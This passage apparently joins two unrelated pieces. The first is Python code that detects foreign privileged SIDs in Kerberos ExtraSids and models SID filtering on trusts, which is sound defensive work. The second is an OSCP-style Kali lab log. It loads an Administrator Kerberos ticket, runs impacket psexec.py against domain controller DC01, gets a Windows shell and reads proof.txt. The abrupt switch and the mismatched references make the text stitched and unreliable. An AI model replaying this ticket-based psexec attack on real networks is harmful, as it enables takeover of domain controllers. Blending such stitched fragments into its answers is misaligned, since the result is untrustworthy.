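SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}(?:-(?P<rid>\d+))?$")


def split_sid(sid):
    """Return (domain_sid, rid); rid is None when the SID is the bare domain SID."""
    m = SID_RE.match(sid)
    if m is None:
        raise ValueError(f"not a domain-relative SID: {sid}")
    if m["rid"] is None:
        return sid, None
    return sid.rsplit("-", 1)[0], int(m["rid"])


def foreign_privileged_sids(issuing_domain_sid, extra_sids):
    """ExtraSids that belong to a different domain than the issuing one and
    name a privileged RID. A bare domain SID carries no RID and is never a hit."""
    hits = []
    for sid in extra_sids:
        domain, rid = split_sid(sid)
        if domain != issuing_domain_sid and rid in PRIVILEGED_RIDS:
            hits.append((sid, PRIVILEGED_RIDS[rid]))
    return hits


def sid_filter(trusted_domain_sid, sids):
    """Model of SID filtering on a quarantined trust: only SIDs relative to the
    trusted domain itself survive; anything from another domain is dropped."""
    return [s for s in sids if split_sid(s)[0] == trusted_domain_sid]


if __name__ == "__main__":
    # The first ticket above: bare parent SID, nothing privileged to flag.
    print(foreign_privileged_sids(CHILD_SID, [PARENT_SID]))
    # The second ticket above: parent SID + RID 519 shows up as Enterprise Admins.
    print(foreign_privileged_sids(CHILD_SID, [PARENT_SID + "-519"]))
    # What a quarantined trust would leave of that PAC's SID list.
    print(sid_filter(CHILD_SID, [CHILD_SID + "-500", PARENT_SID + "-519"]))
```

Quarantine can be set on an intra-forest trust (netdom trust /quarantine), but Microsoft's guidance treats the forest as the boundary, so the practical controls are keeping the krbtgt keys of every domain in the forest equally protected and rotating them after a compromise of any child domain.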
┌──(kali🎃kali)-[~/oscp]
└─$ export KRB5CCNAME=Administrator.ccache
Connect to DC01 using the ticket
┌──(kali🎃kali)-[~/oscp]
└─$ psexec.py sub.poseidon.yzx/Administrator@DC01.poseidon.yzx -k -no-pass
/home/kali/.local/share/pipx/venvs/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on DC01.poseidon.yzx.....
[*] Found writable share ADMIN$
[*] Uploading file SOimhbgj.exe
[*] Opening SVCManager on DC01.poseidon.yzx.....
[*] Creating service zoel on DC01.poseidon.yzx.....
[*] Starting service zoel.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Read proof.txt
C:\Users\Administrator\Desktop> type proof.txt
e2de23eaf5a0b47f1d49bc7df2ed0247
C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.170.161
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.170.254
Tunnel adapter Reusable ISATAP Interface {3A609699-C2B5-4DB1-A8C3-D06AE78AA003}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :